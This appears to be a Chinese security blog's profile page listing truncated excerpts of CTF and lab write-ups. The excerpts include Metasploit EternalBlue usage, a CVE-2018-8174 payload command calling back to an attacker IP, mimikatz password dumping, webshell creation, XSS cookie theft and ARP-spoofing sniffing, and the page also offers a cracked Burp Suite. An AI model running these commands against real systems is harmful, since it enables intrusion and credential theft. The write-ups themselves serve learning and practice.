自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

wh1te 小白的博客

一个没有技术的黑阔

  • 博客(24)
  • 资源 (3)
  • 收藏
  • 关注

原创 Cobalt Strike前期使用以及排坑

开启Cobaltstrike teamserver和运行GUI界面均需要Java环境ps:最好是10.0.1版本 其他版本的java 我运行有些问题服务器端开启:进入Cobaltstrike 目录[root@VM_0_5_centos ~]# cd CobaltStrike开启服务端服务:[root@VM_0_5_centos CobaltS...

2020-01-09 16:48:13 2897 1

原创 年终小总结

一年到头了  感觉浑浑噩噩又过了一年 如果不是快放假了 我都还没意识到又要过完一年了  总感觉今年啥都还没来得及做 就已经完了 为了激励自己在明年可以认认真真学习还是总结一下今年干了些什么1.暑假期间 在某公司实习了一段时间 独立在维护防火墙 给客户设置白名单策略 处理相应的安全问题2.上学期间 期末未挂科  经过努力 考上学校的网安实验班 进一步学习网络安全3.学习方面:...

2018-12-10 10:07:31 288 1

原创 python3 线程

python3和python2的线程有一定的区别python2用的是threadpython3用的是_thread因为python3thread方法很简单,很多东西很难实现。_thread的方法在threading中都有所以我做的总结主要是基于threading的线程模块Python3 通过两个标准库 _thread 和 threading 提供对线程的支持。_thre...

2018-11-22 08:57:54 1331

原创 关于python socket 的学习

从一个简单的 python程序入手import socketurl = 'www.sina.com.cn'port = 80sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.connect((url, port))request_url = 'GET / HTTP/1.1\r\nHost: www.sina.co...

2018-11-19 09:34:00 408 1

原创 调用metasploit进行漏洞复现(应该是一个模式)

在GitHub上下载metasploit模块在本地将.rb复制到 fileformat 目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat/将.rtf复制到 exploits 目录/usr/share/metasploit-framework/data/exploits/启动模块use expl...

2018-11-08 08:37:21 504

原创 网络安全实验室 综合关 解析

网站地址:http://hackinglab.cn/ShowQues.php?type=pentest 第一关 渗透测试第一期先看看 登录界面 发现可以注册和忘记密码 (忘记密码可以重置密码)思路如下,重置admin密码发现 不能直接重置密码 查看注册界面 注册完以后 需要绑定手机号码 抓包看一下 上传参数有用户名  尝试修改为admin绑定成功再次尝试重置...

2018-11-08 08:01:24 2518

原创 一些 好用的工具 分享

Converter 一个很好用的解码工具 截图如下Ziperello  一个暴力破解 zip文件的工具傻瓜式的一键操作 Web Vulnerability Scanner 一个很出名的整站扫描工具Pkav HTTP Fuzzer 可以进行带有图片验证码的密码爆破 ...

2018-11-08 08:00:14 280

原创 CVE-2018-8174复现

先从github上找到对应的exphttps://github.com/Yt1g3r/CVE-2018-8174_EXP下载然后传进kali攻击机中生成payloadpython CVE-2018-8174.py -u http://192.168.2.111/exp.html -o text.rtf -i 192.168.2.111 -p 4444-u payload地址 ...

2018-11-04 16:11:12 771

原创 Meterpreter的一些简单的使用

Meterpreter包含大量的命令,它可以被分成以下几类:1、核心命令2、STDapi :文件指令3、STDapi:网络命令4、STDapi:文件系统命令5、STDapi:用户接口命令6、STDapi:Web Cam命令7、Priv : 提权命令8、Priv : 密码数据库命令9、Priv :时间戳命令除了这些默认命令,meterpreter可以通过使用一...

2018-10-31 07:37:05 848

原创 CVE-2018-4878 flash漏洞复现

先将cve-2018-4878拖入虚拟机中使用msfvenom生成shell代码lhost为攻击机ip地址  lport为自定义端口号查看代码文件 进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件将上面msfvenom生成的代码覆盖掉原来的代码:确认CVE-2018-4878.py下面的文件信息(后面会用到,之后保存...

2018-10-22 08:47:58 1160

原创 记录一次 先手工 再python脚本 验证永恒之蓝ms17-10漏洞

查看资料 ms17-10漏洞利用的步骤大致如下打开msfuse auxiliary/scanner/smb/smb_ms17_010msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalbluemsf exploit(ms17_010_eternalblue) > set ...

2018-10-19 11:16:09 4719 1

原创 网络安全实验室 脚本关 解析

第一关 key又又找不到了打开源码发现有一个search_key.php点进去即可找到第二关 快速口算看起来就很难   很长的算式两秒答  应该要写脚本使用python写先将算式爬下来 具体如下 调用了request 和xpath在爬虫中xpath很好用  火狐有插件xpath finder可以直接看见xpath路径不过我爬出来的结果是一串字符编码 ...

2018-10-11 10:34:40 3522

原创 网络安全实验室 上传关 解析

网站地址:http://hackinglab.cn/ShowQues.php?type=upload第一关 请上传一张jpg格式的图片上传了一张图片发现从语气分析  他可能是要上传的不是jpg格式  直接抓包修改后缀名 即可得到key值第二关 请上传一张jpg格式的图片第二关和第一关一样第三关 请上传一张jpg格式的图片发现修改后缀不可以 根据提示只能是jpg 尝试...

2018-10-08 09:03:36 573

原创 网络安全实验室 基础题 解析

靶场网址:http://hackinglab.cn/第一关  key在哪里?直接右键查看源码即可第二关 再加密一次你就得到key啦~在加密一次的到密码  推测可能是凯撒密码类型 在网上直接找凯撒密码转换器网址:https://planetcalc.com/1434/发现rot13 就是key值第三关 猜猜这是经过了多少次加密?可以多次加密  以=结束 多半是ba...

2018-10-08 08:52:50 2129

原创 记录一次对本地ftp服务器的渗透

实验靶机ip:192.168.88.165kali攻击机ip:192.168.88.138首先对实验靶机进行扫描探测靶场开放的服务与服务的版本-- nmap -sV 靶场IP地址探测靶场全部信息--nmap -A -v 靶场IP地址探测靶场的操作系统类型与版本--nmap -O 靶场IP地址发现靶场开启了 ftp 和ssh服务  尝试搜索关于ftp的一些漏洞...

2018-09-29 09:11:31 5837

原创 ctf实战 掌控安全的靶场 第七关通关记录

 题目 远程连接设置可以上传本机文件在本地设备与资源中选择详细信息将要上传的工具的驱动器勾选上,可以选择u盘 把mimikatz上传至虚拟机 privilege::debug 提升权限 sekurlsa::logonpasswords 抓取密码 得到最后的flag 通关  ...

2018-09-27 09:50:48 940 1

原创 ctf实战 掌控安全的靶场 第六关通关记录

题目上一关已经上传图片马  在菜刀中查看发现c盘有flag.txt 文件但是没有权限访问需要进行提权  发现可以上传文件 可以选择使用 cmd+pr 提权方式上传cmd.exe 和pr.exe上传成功 在菜刀的虚拟终端打开cmd.exe用whoami指令查看当前权限发现权限不足 需要提权 使用pr提权 使用pr添加新用户 将新用户添加至管理组...

2018-09-27 09:30:49 1077 1

原创 ctf实战 掌控安全的靶场 第五关通关记录

题目cookie上一关获得了 就直接在开发者工具里自己修改cookie即可,我用的火狐直接修改就是了(f12) 将名称改为上一关获得的cookie名,值改为上一关得到的cookie值 修改好了点击“准备好了即可”查看可以上传文件类型发现可以上传cer文件可以利用iis6.0漏洞进行上传asp木马后缀名改为.cer  用菜刀上传即可在产品管理中可以修改 文件图片...

2018-09-27 09:05:06 1069

原创 ctf实战 掌控安全的靶场 第四关通关记录

掌控安全封神台第四关根据提示为存储型xss flag在cookie中 xss平台其实网上就有 可以直接用 xsspt.com xss平台大致如下点击创建项目输入项目名字 选择模块是要注意选择 默认模块和xss.js生成代码 将xss语句插入到留言板中 即可在xss平台中接收到平台模拟的管理员访问记录 得到flag 通关...

2018-09-20 10:23:25 1669 1

原创 ctf实战 掌控安全的靶场 第三关通关记录

掌控安全封神台第三关 根据题目可能要用burp进行抓包,点击传送门进入题目主页之前题目说的扫描到新的后台地址admin123 在网址后加入admin123 进入新的后台管理页面根据第二关得到的用户和密码进行登录  进入后得到这样一个页面抓包结果如下根据代码分析只需要修改host和referer的ip地址修改以后结果还是进不去分析一下问题  打开F...

2018-09-20 10:13:34 3367 3

原创 遇到的ctf 套路 记录(长期)

掌控安全封神台:伪造本来用户登录burp抓包 修改 Host和Referer参数 改成127.0.0.1即可存储型xss利用xss漏洞平台创建xss语句插入存在存储型xss漏洞的位置,在xss平台等待响应上传木马用cmd创建一句话木马 copy 1 .jpg/b + 1 .php/a 2 .jpg 查看上传允许文件类型 发现可以上传cer文件 可利用iis6.0漏洞 将木马...

2018-09-20 08:45:29 983

原创 ctf实战 掌控安全的靶场 第一关通关记录

第一关进入传送门  发现是一个猫舍网站 点击查看新闻   进入猫舍界面内网址为http://120.203.13.75:6815/?id=1  疑似可注入  尝试 and1=1回显正常 尝试 and1=2回显失败 存在sql注入 可以选择手工注入  也可以直接用工具   这里我用的是sqlmap(一个很强大的工具)sqlmap具体使用方法自己百度 贴一个比较好的...

2018-09-17 10:11:26 5765 2

原创 kali 实战 记录一次图书馆的内网嗅探(没找到合适的,就嗅探的本机)

第一步肯定是打开kali,这次可能用到的工具有 Ettercap driftnet因为嗅探用的是arp欺骗所以第一步应该打开路由转发echo 1 >> /proc/sys/net/ipv4/ip_forward可以用cat指令查看自己是否打开了路由转发cat /proc/sys/net/ipv4/ip_forward显示为1  则为路由转发成功查看自己ip地址 ifconfig虚拟机的...

2018-06-13 21:36:04 10390 3

原创 记录自己tcp/ip 学习路程(1)

TCP主要特点:连接向导,可靠运输,流量控制,双全共,h

2018-06-10 22:38:09 134

java一键配置

java环境配置一直很复杂,有些小萌新可能做不来,在网上找的一键配置的傻瓜脚本。发给大家

2018-10-12

burpsuite_pro_v1.7.30

Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。破解版的

2018-10-12

pkavhttpfuzzer

适用于Windows系统,一款强大的自带验证码识别的暴力破解安全测试工具,有的时候遇到验证码爆破时,这款软件就减轻了很大的工作量!业界神器,小东翻了好久才找到的,分享给大家了~

2018-10-11

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除